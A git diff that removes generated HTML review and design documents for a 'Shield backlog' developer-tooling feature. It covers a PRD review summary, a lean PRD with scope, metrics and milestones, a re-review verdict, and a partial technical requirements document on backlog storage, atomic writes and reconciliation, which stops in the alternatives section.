P2 — nice to have (4)

-
    -
  • Dim 2b (Critical, B). Several §10 out-of-scope items are bare; add a one-line why-deferred each.
  • -
  • Dim 2c (Warning, F). No scope-creep guard naming the likely creep ask + decision authority (@ashwinimanoj).
  • -
  • Dim 7c (Important, B). Sign-off N/A names no confirmer → "N/A — internal tooling (confirmed by @ashwinimanoj)".
  • -
  • Dim 12c (Warning, B). Promote resolved §9 open questions into a short decision log.
  • -
-
-

DX anti-patterns (cross-cutting)

-

Two of these were introduced by the recent edits — worth fixing before /plan:

-
    -
  1. (P1) M3 vs §9 contradiction. §8 M3 states "/backlog reconciles on view" as settled, but §9 still lists the reconciliation trigger as Open ("on view / end of /plan / both"). A developer can't implement M3 against an unsettled trigger. → Resolve §9 or soften M3.
  2. -
  3. (P2) "removed automatically" vs user-triggered. §6 says entries are "removed automatically," but reconciliation runs on /backlog view (a user action) — and §6's own non-goal disclaims "automatic surfacing machinery." → Replace "automatically" with "on next /backlog view."
  4. -
  5. (P1) kind field undefined but assumed settled. §6 + M1 commit to "epic/story/task granularity" and M1 says "schema defined," yet §9 leaves the backing kind field open. → Decide kind before M1.
  6. -
  7. (P1) Capture-from-skill interface undefined. M1 requires capture "usable from any Shield skill" but no command/helper/write-contract is specified. → Define the capture entrypoint.
  8. -
  9. (P1) Reconciliation match key — see P1-8.
  10. -
  11. (P1) Unfalsifiable metrics — see P1-3.
  12. -
-

Clarity strengths (keep): problem-first ordering; the feature=key / epic=gate distinction is load-bearing and well-defined; non-goals are thorough with rationale; lean exemptions are explicit and correct.

-

Tech-lead NFR notes (informational, lean-exempt — but real)

-

Not gating, but cheap to fold in now since the plan will need them:

-
    -
  • Atomic write + concurrency for backlog.json (write-temp-then-rename; concurrent capture vs reconcile-rewrite is the primary failure case).
  • -
  • Schema versioning — add schema_version so the open §9 shape decisions (ordering, kind) can evolve via read-old/write-new.
  • -
  • Read-contract drift — reconciliation should no-op (never remove) if manifest.json/plan.json are missing or an older shape, not error.
  • -
  • Recovery posturebacklog.json is git-tracked, so a bad reconciliation is git revert-able; consider a dry-run/confirm before reconcile removals in v1.
  • -
-
- -
    -
  1. Fix P0-1 (risks/assumptions) and the two edit-induced contradictions (#1, #2) — all small.
  2. -
  3. Resolve the three M1-gating open questions (kind, ordering, reconciliation trigger) or mark them deferred-with-default.
  4. -
  5. Specify the epic match key (P1-8) — it's the correctness heart of reconciliation.
  6. -
  7. Re-run /prd-review or proceed to /plan once P0 is cleared.
  8. -
-

Files: summary.md (this), enhanced-prd.md (annotated), review-comments.json, detailed/*.md ×5.

- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html deleted file mode 100644 index c1857896..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/enhanced-prd.html +++ /dev/null @@ -1,364 +0,0 @@ - - - - - -Shield PRD Review - - - -
Shield PRD Review · feature backlog-20260527 · 2026-05-27 · rendered from markdown (source of truth in reviews/prd/2026-05-27/)
-

Shield Backlog

- -

1. Header

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
FieldValue
Owner@ashwinimanoj
StatusDraft
PRD typeLean
Date created2026-05-27
Last updated2026-05-27
Linked design specnull
Linked researchnull
Decision-maker@ashwinimanoj
Sign-off contacts(n/a for internal tooling)
Linked plans(auto-populated by /plan)
-

2. Terminologies

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
TermDefinition
BacklogA project-level, ordered list of future work captured across the Shield workflow. Lives at docs/shield/backlog.json.
Backlog entryOne captured idea — a future epic, story, or task. May not be actionable when captured. Carries an order, a kind hint (epic | story | task), a source (user | agent), and a feature + epic association (either may be proposed-new until promotion).
Feature associationThe feature an entry belongs to (a docs/shield/<feature>/ folder). It is the reconciliation key: manifest.json is keyed by feature, so this is how an entry is matched to its pipeline progress. May be proposed-new until promotion.
Epic associationThe epic an entry slots into when planned — an existing epic id (e.g. EPIC-2) or a proposed new epic. Acts as the gate at reconciliation: the entry is removed only when this epic's work appears in the feature's plan.json.
PromotionActing on a backlog entry by starting the appropriate Shield step for it — /research, /prd, /plan, or /implement. The user decides which step; the backlog does not auto-route.
ReconciliationKeeping the backlog current: manifest.json locates the entry's feature and whether it has a plan.json; if so, the entry's epic is looked up there. The entry is removed once its epic's work appears in the feature's plan.json (epics[].stories[]). No ids are stamped — matching is by feature (manifest) + epic (plan): an existing-epic entry matches by epic id, a proposed-new-epic entry matches by epic name (names expected stable). On any ambiguity or no match, the entry stays — reconciliation never removes on doubt. A prd-only feature does not trigger removal. Removal fires at the end of the /plan or /implement run promoted from the entry, or on the /backlog view sweep.
Agent-discovered entryA backlog entry the agent adds on its own when it notices future work mid-task (vs. a user-created entry).
-

3. Problem & context

-

Future work surfaces constantly while using Shield — during /research, while writing a PRD, mid-/plan, and especially during /implement ("we should also handle X later", "this whole area needs a rewrite"). Today there is nowhere to park that work. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.

-

Concretely:

-
    -
  • There is no project-level, ordered place to capture "not now, but later" items. plan.json only holds work already committed to a milestone; manifest.json is an artifact index. Neither captures un-triaged future work.
  • -
  • Ideas discovered by the agent mid-task have no home — they're mentioned once in conversation and gone.
  • -
  • When future work is remembered, there's no consistent path from "loose idea" to "stories in a plan." Each pickup re-derives the epic, the feature, and the scope from scratch.
  • -
-

Why now: Shield's pipeline (/research → /prd → /plan → /implement) is mature, but it only handles work that's already been decided on. The gap is the staging area before that pipeline — where future work waits, ordered, until the user promotes it in.

-

4. Target users / personas

- - - - - - - - - - - - - - - - - - - - - - - -
IDPersonaGoalsFrictions today
P1Ashwini — Shield maintainer running /research//plan//implement dailyCapture future work without losing focus on the current task; come back later to an ordered list of what to pick up nextFuture ideas get lost or derail the current task; no ordered "later" list at the project level
P2The agent (Claude) running a Shield taskRecord follow-up work it discovers mid-task so the human doesn't have to remember itDiscovered work is mentioned once in chat then forgotten; no place to persist it
-

5. Architecture & flows

-

A single global store docs/shield/backlog.json (sibling to manifest.json), a /backlog command to view it, a capture path usable from any Shield skill or by the user, and a user-driven promotion: the user picks an entry and starts whichever Shield step fits — /research, /prd, /plan, or /implement. Each entry carries an order, a source (user | agent), and a feature + epic association. Reconciliation reads manifest.json as the project-level index — to find each entry's feature, see whether it has a plan.json, and surface its pipeline status (research/prd/plan) in the /backlog view — then opens the flagged plan.json and removes any entry whose epic's work now appears there. A prd-only feature stays in the backlog; only committed work is removed. No ids are tracked. An entry promoted via /plan or /implement is pruned at the end of that run (the command carries the entry as a transient promotion reference); the /backlog view sweep is the lazy safety net for work that landed without an explicit reference; and a manual remove clears ideas decided against or anything not tied to a promotion run.

-
flowchart LR
-  cap["Capture<br/>(user or agent, anytime)"] --> bl["backlog.json<br/>(ordered, project-level)"]
-  bl --> view["/backlog<br/>(ordered list +<br/>per-entry pipeline status)"]
-  man["manifest.json<br/>(feature index:<br/>research/prd/plan)"] --> view
-  bl --> dec{"User decides<br/>next step"}
-  dec --> research["/research"]
-  dec --> prd["/prd"]
-  dec --> plan["/plan"]
-  dec --> impl["/implement"]
-  man --> rec["Reconcile → remove from backlog:<br/>end of promoted /plan or /implement,<br/>or /backlog sweep (work now in plan.json)"]
-  plan --> rec
-  impl --> rec
-  rec --> bl
-
-

6. Goals & non-goals

-

Goals

-
    -
  • Capture future work (epic / story / task granularity) at any point in the workflow — before a PRD exists, during planning, during implementation — without derailing the current task.
  • -
  • Support both capture sources: user-created and agent-discovered.
  • -
  • Keep the backlog ordered so there's a clear "what to pick up next."
  • -
  • Every entry is associated with a feature and an epic — existing or proposed-new — and the agent suggests a matching feature/epic at capture or promotion time.
  • -
  • A /backlog command shows the current backlog, ordered, with each entry's feature + epic association, source, and pipeline status (research / prd / plan, read from manifest.json) — so you can see what's been started (e.g. a prd written) without the entry being removed.
  • -
  • Provide a user-driven promotion path: the user picks an entry and starts the Shield step they judge appropriate (/research, /prd, /plan, or /implement). The backlog suggests, but does not dictate, the next step.
  • -
  • Keep the backlog current: an entry promoted via /plan or /implement is removed at the end of that run; the /backlog view also sweeps out any entry whose work has since landed in a plan.json. The backlog reflects only not-yet-committed work.
  • -
  • Manual remove: any entry can be explicitly removed from /backlog — covers ideas decided against and entries not cleared by a promotion run.
  • -
-

Non-goals

-
    -
  • Automatic end-of-task surfacing machinery (hooks). The agent already calls out new entries conversationally; no dedicated surfacing mechanism in v1.
  • -
  • Per-feature backlogs. v1 is a single global backlog.
  • -
  • A status/workflow engine. The lifecycle is minimal: an entry exists until it is removed — at the end of the /plan or /implement it was promoted from, by the /backlog sweep once its work is in a plan.json, or manually. No multi-state machine.
  • -
  • Syncing the backlog to the PM tool (ClickUp/Jira/etc.). The backlog is a pre-pipeline staging area; PM sync happens after promotion, via the existing /pm-sync on the resulting plan.
  • -
  • Replacing the PM tool's own backlog. This is Shield-local triage, not a project-management backlog of record.
  • -
-

7. Success metrics

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
MetricTypeTargetCounter
Captured entries that get acted on (work started, or removed once it lands in a plan) vs. left to rotOutcome≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; <20% sit untouched >60 daysEntries pile up un-triaged → backlog becomes a graveyard
Entries carrying a feature + epic association at promotion timeQuality100% — promotion cannot complete without a feature and epicForcing association makes capture so heavy nobody captures
Agent feature/epic-suggestion acceptanceQuality≥60% of agent feature/epic suggestions accepted without overrideBad suggestions that users routinely override
Capture frictionAdoptionCapture is a single /backlog add (or one agent action) and never blocks the current taskCapture is so quick the backlog fills with low-signal noise
-

Measurement (v1): no telemetry — metrics are tracked manually via a periodic /backlog audit and the git history of backlog.json (entry add/remove commits). Owner: @ashwinimanoj.

-

8. Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
IDNameOutcomeExit criteriaDepends on
M1Capture + store + viewA global backlog.json exists; entries can be added (user + agent) with order, source, and feature + epic association; /backlog shows the ordered list with per-entry pipeline status from manifest.jsonbacklog.json schema defined; an entry can be captured from a skill or by the user; /backlog renders the ordered backlog with feature + epic and a research/prd/plan status read from manifest.json; an entry can be manually removed from /backlog
M2Feature + epic association + suggestionEvery entry references a feature and an epic (existing or proposed new); the agent suggests a matching feature/epicCapture prompts for a feature + epic; agent scans manifest.json features and known epics and proposes a match; user can accept, pick another, or create-newM1
M3Promotion + reconciliationThe user picks an entry and starts the Shield step they choose (/research, /prd, /plan, or /implement); once the entry's epic's work appears in the feature's plan.json, it is removed from the backlogReconciliation uses manifest.json (find feature, has-plan?) + plan.json (epic present?) — no ids stamped; a prd-only feature is not removed; removal fires eagerly at the end of the /plan or /implement run promoted from the entry and lazily on the /backlog sweep; the user-chosen step is never overriddenM2
-

9. Open questions

-

Decided (locked for v1)

-
    -
  • Reconciliation triggers: an entry is removed (a) eagerly at the end of the /plan or /implement run it was promoted from — the entry id is passed to the command as a transient promotion reference, and the entry is pruned on success; and (b) lazily by the /backlog view sweep, which prunes any entry whose epic's work is now in a plan.json (the safety net for work that landed without an explicit reference). The promotion reference is a runtime command argument, not an id stamped into plan.json.
  • -
  • Reconciliation match key: feature (via manifest.json) + epic. Existing-epic entries match by epic id; proposed-new-epic entries match by epic name (names expected stable). On ambiguity or no match, the entry stays — reconciliation never removes on doubt.
  • -
  • Ordering scheme: a single explicit integer order field per entry (like orderindex); no priority buckets in v1.
  • -
  • Entry granularity: entries carry a kind hint (epic | story | task); promotion always yields ≥1 story regardless of kind.
  • -
  • Shippable work routes through /plan: anything that produces stories is promoted via /plan so it lands in plan.json (the lazy-sweep signal) and is pruned at the end of that /plan run. Direct /implement stays available for rare tiny planless changes; when promoted from an entry, that entry is pruned at the end of the /implement run too.
  • -
  • Manual remove: /backlog supports explicitly removing an entry — for ideas decided against, or any entry not cleared by a promotion run (e.g. captured-then-abandoned). Removal is a plain delete; no retained history in v1.
  • -
-

Still open

-
    -
  • Feature/epic discovery cost. Epics live inside per-feature plan.json, so confirming an entry's epic means opening the plan the manifest flags as having one. (Leaning: manifest as the index, open only flagged plan.json files; add a project-level epic index only if this gets slow.)
  • -
  • Dropped/rejected entries. Do we need an explicit terminal state for "decided against," or is deleting the entry enough? (Deferred — see §11 Out of scope.)
  • -
-

10. Risks & assumptions

-

Risks

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
RiskMitigationOwner
Backlog becomes a graveyard (captured, never acted on)Reconciliation prunes plan-committed work on /backlog view; periodic audit surfaces stale entries; §7 counter-metric tracks it@ashwinimanoj
Concurrent writes corrupt backlog.json (capture racing reconciliation)Atomic write (temp-then-rename); validate-or-refuse on read; backlog.json is git-tracked so corruption is revertable@ashwinimanoj
Reconciliation wrongly removes an entry (epic-name collision / ambiguous match)Match on feature + epic only; never remove on ambiguity (entry stays); git revert recovers any bad removal@ashwinimanoj
Capture friction too high → nobody capturesSingle-step capture; agent can capture without prompting@ashwinimanoj
-

Assumptions

-
    -
  • (unvalidated) Agents reliably surface follow-up work conversationally — the entire no-hooks non-goal (§6) rests on this. Revisit if discovered work is still being lost after v1.
  • -
  • (unvalidated) The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own backlog.json history will validate it.
  • -
  • (assumed stable) Epic names in plan.json are stable enough to serve as the proposed-new-epic match key (see §9).
  • -
  • (validated) manifest.json is feature-keyed and plan.json carries epics[].stories[] — confirmed against the current schema.
  • -
-

11. Out of scope / Non-goals

-
    -
  • Automatic end-of-task surfacing via hooks (the agent calls it out conversationally; revisit if that proves unreliable).
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • An audit trail / retained history for removed or declined entries (manual remove is a plain delete in v1 — the entry is gone, with no kept record).
  • -
  • /pm-sync of backlog entries to the PM tool before promotion.
  • -
  • Cross-project / multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field (no drag-and-drop, no auto-prioritization).
  • -
-
-
-

This is a lean PRD. It intentionally omits the following standard sections:

-
    -
  • Section 8 — User stories & scenarios
  • -
  • Section 9 — Functional requirements
  • -
  • Section 10 — Non-functional requirements
  • -
  • Section 11 — RBAC & permissions matrix
  • -
  • Section 12 — Dependencies
  • -
  • Section 13 — Risks & mitigations
  • -
  • Section 14 — Assumptions
  • -
  • Section 15 — Rollout plan (full — lean has its own §8 Milestones)
  • -
  • Section 16 — Cost & resource impact
  • -
  • Section 17 — GTM & customer-comms
  • -
  • Section 18 — Support / CX impact
  • -
-

If scope grows or stakeholders need more detail, run /prd again — Shield -will offer to add specific sections or upgrade to standard.

-
- - - diff --git a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html b/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html deleted file mode 100644 index 1cd1edb0..00000000 --- a/docs/shield/backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html +++ /dev/null @@ -1,203 +0,0 @@ - - - - - -Review — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

PRD Review — Shield Backlog (re-review)

-

Source: docs/shield/backlog-20260527/prd.md (snapshot: source-prd.md) -PRD type: Lean · Date: 2026-05-27 (run _2) · Reviewers: 13 dispatches -Prior run: reviews/prd/2026-05-27/ — Needs Work (2.7, 1 P0)

-

Verdict: Ready (composite 3.1, 0 P0s)

-

The P0 is cleared and the edits landed cleanly. Composite rose 2.7 → 3.1; the product-manager persona went C → B as the three flagged dims recovered. One residual contradiction from the rapid editing remains as a P1 (cheap fix), and the capture-from-skill interface is the main thing /plan will need to pin down.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PersonaWeightRun 1Run 2
product-manager1.0C (2.17)B (3.33)
agile-coach1.0BB (3.0)
tech-lead1.0InformationalInformational
dx-engineer0.7BB (3.0)
finops-analyst0.7N/AN/A
Composite2.693.12
P0s10
-

Per-dimension (Δ vs run 1)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DimNameRun 1 → Run 2
1Problem clarityD → C
2Scope boundariesB → A
3Measurable successC → A
4Scenario coverage & ACB → B
7RACI & approvalsA → A
11Why nowC → C
12Risks & assumptionsD → A (P0 cleared)
5,6,9,10,13(NFR/ops/GTM/CX/cost)informational/N/A (lean)
8Legal/privacyN/A
-

What the fixes resolved: §10 Risks & assumptions (risks+mitigations+owner, validated/unvalidated tags) cleared the P0 (12a F→A, 12b→A); numeric metric targets + measurement owner (3a/3d) lifted dim 3 C→A; the named persona (1a A) and the why-deferred/scope content lifted dims 1 and 2.

-
-

No P0s. Remaining items (all non-blocking)

-

P1 (3)

-
    -
  • P1-1 · §2 residual contradiction (DX). §2 Epic association still says the entry "is removed only when this epic's work appears in plan.json" — but we added a manual remove trigger (ideas decided against never hit a plan). Leftover from the earlier gate-only model. → Change "only when" to "when" or add "(or removed manually)". Cheap, and I introduced it — recommend fixing now.
  • -
  • P1-2 · Capture-from-skill interface undefined (DX). §5/§8 require capture "usable from any Shield skill" but no command/helper/write-contract is specified. → Define the capture entrypoint (this is the main /plan-level unknown).
  • -
  • P1-3 · Problem baseline still unquantified (1b, C; 11a/11b, C). Honestly logged as an unvalidated assumption rather than measured. Acceptable for v1, but a single real figure from past /implement transcripts would harden the "why now."
  • -
-

P2 (4)

-
    -
  • §2/§5 eager-removal "promotion reference" mechanism is prose-only (how /plan//implement receive + act on it). Pin in /plan/TRD.
  • -
  • State that eager-prune and the /backlog sweep are idempotent (remove-if-present) so they can't double-remove or race.
  • -
  • 2c — no explicit scope-creep guard naming the likely creep ask + decision authority.
  • -
  • 7c — sign-off N/A names no confirmer; 3d — audit cadence vague ("periodic").
  • -
-

Tech-lead NFR notes (informational, lean-exempt — good /plan/TRD inputs)

-
    -
  • Schema versioning (6e): add schema_version to backlog.json now + a migration policy — cheap at definition, expensive to retrofit.
  • -
  • Read-contract drift (6f): reconciliation should treat unrecognized manifest.json/plan.json shapes as "doubt → entry stays," never crash/guess.
  • -
  • Perf budget (5a): state a /backlog sweep budget (e.g. <1s up to ~50 features) to trigger the §9 "add an index if slow" decision.
  • -
  • Rollback (6c): name a one-line trigger — if eager prune wrongly removes and git-revert is costly, fall back to manual-remove-only.
  • -
-
-

DX consistency check (the reason we re-reviewed)

-

The three-trigger removal model is now consistent across §5, §5-mermaid, §6, §8 M3, and §9 — the earlier "on /backlog view only" wording is fully gone, and the proposed-new-epic match key + "never remove on doubt" invariant are stated consistently in §2/§9/§10. The only residual leftover is the §2 "only when" phrasing (P1-1).

-

Recommendation

-

Ready for /plan. Optionally fix P1-1 first (one-line, mine to fix) and decide the capture interface (P1-2) — though that one is legitimately /plan/TRD-level. The tech-lead schema-versioning + read-contract notes should be carried into the TRD.

-

Files: summary.md · enhanced-prd.md · review-comments.json · detailed/*.md ×5.

- -
-
Generated by Shield
- - diff --git a/docs/shield/backlog-20260527/outputs/trd.html b/docs/shield/backlog-20260527/outputs/trd.html deleted file mode 100644 index 1aea5509..00000000 --- a/docs/shield/backlog-20260527/outputs/trd.html +++ /dev/null @@ -1,531 +0,0 @@ - - - - - -TRD — backlog-20260527 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - - -

TRD — Shield Backlog

-
-

In one line: a project-level "later" list (docs/shield/backlog.json) that -captures future work from anywhere in the Shield workflow, shows it ordered with -per-entry pipeline status, and prunes itself when that work lands in a plan — so -ideas stop getting lost without becoming a graveyard.

-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
FieldValue
ProjectShield
Featurebacklog-20260527
Domainbackend (Python)
Owner@ashwinimanoj
Linked PRD./prd.md (reviewed Ready, composite 3.12)
Linked plan./plan.md · Sidecar: ./plan.json
StatusDraft
-

§1 Document Overview {#document-overview}

-

This TRD covers Shield Backlog v1 — a single project-level store of future work, -a /backlog command to view and curate it, a capture path callable by the user or by -any Shield skill, a user-driven promotion path, and a reconciliation engine that prunes -entries once their work commits to a plan. It is read by the Shield maintainer -(@ashwinimanoj) and by any contributor implementing the /backlog command, the -backlog_store, the epic-suggester, or the reconciler.

-

It derives its problem framing, users, goals, and risks from the linked PRD -(./prd.md, lean, reviewed Ready) and translates them into testable -functional/non-functional requirements, a component design, and a ship plan. The -execution breakdown (epics, stories, acceptance criteria) lives in -./plan.md and its sidecar ./plan.json; this document -stays at the "what fits where and why" level — component-internal detail lives in the -three LLD drafts (./lld-backlog-store.md, -./lld-epic-suggester.md, -./lld-reconciler.md).

-

§2 Problem Statement {#problem-statement}

-

Shield's pipeline (/research → /prd → /plan → /implement) only acts on work that has -already been decided on. There is no staging area upstream of it: plan.json -holds only milestone-committed work, and manifest.json is an artifact index — neither -models an un-triaged "do this later" item. The technical gap is therefore a missing -ordered, project-level, persistent queue that any pipeline step (or the agent -mid-task) can append to without derailing the current task, and that drains itself once -an item's work reaches a plan.

-

See PRD §3 Problem & context for the user-facing narrative (lost ideas, -mid-/implement "we should also handle X later", no consistent path from loose idea to -planned stories). This section restates only the engineering shape of that gap: a -capture-anywhere write surface + an ordered store + a removal gate keyed off existing -Shield artifacts.

-

§3 Objective & Scope {#objective-scope}

-

Deliver a global backlog store, a /backlog view/curate command, a -user-and-agent capture path, a feature+epic association with agent suggestion, and a -promotion+reconciliation loop that keeps the backlog reflecting only not-yet-committed -work.

-

In scope

-
    -
  • A single global store docs/shield/backlog.json with a versioned JSON Schema and a Python validator.
  • -
  • A capture path: /backlog add (user) and a documented capture() write helper (skills/agent), atomic and validate-or-refuse.
  • -
  • /backlog view: ordered list, per-entry feature+epic+source, and pipeline-status badges read from manifest.json.
  • -
  • Feature+epic association (either may be proposed-new) with exact-normalized agent suggestion.
  • -
  • User-driven promotion (the user picks /research|/prd|/plan|/implement); a transient promotion reference.
  • -
  • A reconciliation engine + eager prune, lazy sweep, manual remove, and a kill switch.
  • -
  • An executable eval suite + version bump.
  • -
-

Out of scope (per PRD §6/§11)

-
    -
  • Hooks / automatic end-of-task surfacing machinery.
  • -
  • Per-feature backlogs and a global↔per-feature promotion path.
  • -
  • A status/workflow state machine; an audit trail for removed entries (manual remove is a plain delete in v1).
  • -
  • /pm-sync of backlog entries before promotion; cross-project/multi-repo backlogs.
  • -
  • Reordering UX beyond editing the order field; multi-writer locking (single-writer assumption — see §6 N1).
  • -
-

§4 Product Journey {#product-journey}

-

Backend interpretation — the representative paths exercised by the change:

-
    -
  1. Capture (user). /backlog add "<text>"capture() assigns a uuid4 id and the -next integer order, prompts for / accepts a feature + epic (proposed-new allowed), -writes the full doc to backlog.json.tmp, then os.replace()backlog.json.
  2. -
  3. Capture (agent). A Shield skill mid-task calls -capture(text, kind=…, feature=…, epic=…, source="agent") and receives the entry id. -Same atomic write; never blocks the current task.
  4. -
  5. View. /backlog reads backlog.json (validate-or-refuse), sorts by order, and -for each entry looks up its feature in manifest.json to render -research ✓ prd ✓ plan – style badges. A lazy reconciliation sweep runs over all -entries (unless the kill switch is off) before rendering.
  6. -
  7. Promote. /backlog promote <id> launches the user-chosen Shield step and forwards -<id> as a transient runtime reference (never stamped into plan.json).
  8. -
  9. Reconcile / prune. At the end of a promoted /plan or /implement run, if the run -carried a promotion reference, the entry is pruned (eager). The /backlog view sweep is -the lazy safety net. Both call the one reconciliation engine and log every removal.
  10. -
  11. Manual remove. /backlog remove <id> plain-deletes an entry (confirm-before-delete); -git revert recovers it only if it had reached a commit.
  12. -
-
flowchart LR
-  add["/backlog add (user)"] --> store["backlog.json (atomic write)"]
-  skill["capture() (agent)"] --> store
-  store --> view["/backlog view\n(ordered + status badges)"]
-  man["manifest.json"] --> view
-  view --> promote["/backlog promote <id>\n(transient reference)"]
-  promote --> step["/research | /prd | /plan | /implement"]
-  step --> recon["reconciliation engine"]
-  view -. lazy sweep .-> recon
-  recon --> store
-
-

§5 Functional Requirements {#functional-requirements}

-

Backend interpretation — each item is a verifiable behavior:

-
    -
  • F1. backlog.json validates against shield/schema/backlog.schema.json; an entry -with an unknown kind (∉ {epic, story, task}) or source (∉ {user, agent}) is rejected -with a named error.
  • -
  • F2. Entry id is a uuid4 string; the validator (validate_backlog.py) rejects an -entries[] array containing duplicate id values with the named error duplicate_entry_id. -(JSON Schema draft 2020-12 uniqueItems is whole-item equality and cannot express -property-level uniqueness, so this check lives in the validator, not the schema.)
  • -
  • F3. capture(text, *, kind="task", feature=None, epic=None, source) -> str appends one -entry, assigns the next integer order and a fresh uuid4 id, and returns that id. It is -callable from /backlog add (source=user) and from any skill (source=agent).
  • -
  • F4. All writes are atomic: full document → backlog.json.tmpos.replace(). A kill -mid-write never leaves a corrupt backlog.json (at most a stray .tmp).
  • -
  • F5. Reads are validate-or-refuse: a malformed/partial backlog.json raises -BacklogInvalid (named error), never a silent truncation or partial parse.
  • -
  • F6. Promotion forwards the entry id as a transient runtime reference only; neither -plan.json nor any story record is mutated by promotion (the no-stamping trust boundary).
  • -
  • F7. Feature/epic suggestion uses exact normalized match (casefold() + collapsed -whitespace) by name, for both existing and proposed-new epics. No fuzzy/token-overlap -ranking. A tie (≥2 normalized matches) surfaces all tied candidates and auto-picks none; -no match → the entry is captured proposed-new.
  • -
  • F8. The "epic landed" predicate (single source of truth, used by every removal path): -an entry is removed iff an epic with the matching normalized-exact name is present in -plan.json.epics[]. The match is by name, not by the positional EPIC-N idEPIC-N -is a within-a-single-plan slot reassigned on every re-/plan, so it is not a stable cross-plan -key (an epic reordered across a re-plan must still resolve by name). Story status is never -consulted; a prd-only feature is never removed; ambiguity or no match → the entry stays.
  • -
  • F9. Eager prune (end of promoted /plan|/implement) and lazy sweep (/backlog view) -are idempotent (remove-if-present) and call the same reconciliation engine. Every removal -emits a structured log line: {entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}.
  • -
  • F10. A .shield.json flag backlog.auto_reconcile (default true) disables both -eager prune and lazy sweep when false, leaving manual remove functional.
  • -
-

§6 Non-Functional Requirements {#non-functional-requirements}

-

Backend interpretation — measurable targets and guarantees:

-
    -
  • N1 — Integrity under single-writer. Shield is single-actor (N5), so v1 assumes one -writer: no lock. Correctness rests on full-doc → .tmpos.replace() (atomic rename), -validate-or-refuse reads, and a compare-before-replace check: capture()/remove() -record the on-disk schema_version+entry-count (or mtime/hash) at read time and refuse the -os.replace() (raising BacklogInvalid) if the file changed underneath. This converts a -silent lost-update — the failure mode if N5 is violated — into a loud refusal without a -lockfile. The concurrency eval (EPIC-4-S1) asserts the refusal fires and no entry is lost -or corrupted. Multi-writer locking is deferred until Shield becomes multi-actor.
  • -
  • N2 — View latency. /backlog view + lazy sweep completes in ≲ 1s for a backlog of -≤ ~200 entries against a typical manifest.json. A debug-gated latency line reports actual -view+sweep wall time so "revisit if breached" is falsifiable rather than impressionistic.
  • -
  • N3 — Drift tolerance / no-crash. An unrecognized manifest.json / plan.json shape is -treated as doubt (entry stays) with a logged warning; reconciliation never raises on a -shape it doesn't recognize.
  • -
  • N4 — Recoverability. backlog.json is git-tracked; a wrong removal that reached a commit -is recoverable via git revert. For an end-of-run eager prune (which may fire before -backlog.json is committed), the v1 recovery mechanism is the transient append-only -.shield/backlog-removed.log: the pruned entry is appended before the destructive remove, -and replaying the log restores it. Commit-before-prune was considered and rejected as a v1 -non-goal (it would force a possibly-dirty-tree commit on every prune and couple recovery to git -state mid-/implement). A manual remove of an uncommitted entry is unrecoverable by design -(documented).
  • -
  • N5 — Single-actor assumption. The whole concurrency posture (N1) and the no-lock design -rest on Shield being driven by one actor at a time. This is stated as an assumption, not a -guarantee; if violated, N1's mitigation must be revisited.
  • -
-

§7 High-Level Design {#high-level-design}

-

Backend interpretation — components and the data they exchange. Three Python -components plus the command/skill surface, all reading/writing the one store.

-
        ┌────────────────────────────────────────────────────────────┐
-        │  /backlog command  +  backlog SKILL.md  (add/view/remove/    │
-        │                       promote)                                │
-        └───────┬───────────────┬───────────────┬─────────────────────┘
-                │ capture()      │ view          │ promote(id)
-                ▼                ▼               ▼
-        ┌───────────────┐  ┌──────────────┐  (transient ref → /plan|/implement)
-        │ backlog-store │  │ epic-suggester│
-        │ (atomic R/W,  │  │ (manifest +   │
-        │  validate)    │  │  plan.json    │
-        │               │  │  exact-norm   │
-        │               │  │  match)       │
-        └──────┬────────┘  └──────┬────────┘
-               │ read/write       │ read
-               ▼                  ▼
-        ┌──────────────────────────────────────┐
-        │ docs/shield/backlog.json (ordered)    │
-        └──────────────────────────────────────┘
-               ▲                  ▲
-               │ remove-if-present│ read (epic-landed predicate, F8)
-        ┌──────┴────────┐         │
-        │  reconciler   │─────────┘  reads manifest.json (feature index)
-        │ (engine + eager│            + flagged plan.json (epics[])
-        │  prune + lazy  │
-        │  sweep + kill  │
-        │  switch + log) │
-        └────────────────┘
-
-
    -
  • backlog-store owns the store contract: schema, capture(), read (validate-or-refuse), -remove, atomic write. It is the only writer of backlog.json.
  • -
  • epic-suggester is read-only: given capture text + a candidate feature, it scans -manifest.json features and the feature's plan.json epics and returns exact-normalized -candidates (F7). It never writes.
  • -
  • reconciler holds the engine (F8 predicate + never-remove-on-doubt + drift tolerance + -removal logging) and the two triggers (eager prune, lazy sweep) gated by the kill switch (F10). -It calls backlog-store to remove entries.
  • -
  • manifest.json is the feature index (does the feature exist? does it have a -plan.json?). plan.json.epics[] is the removal gate. No ids are stamped into either.
  • -
-

§8 Alternatives Considered {#alternatives-considered}

-
    -
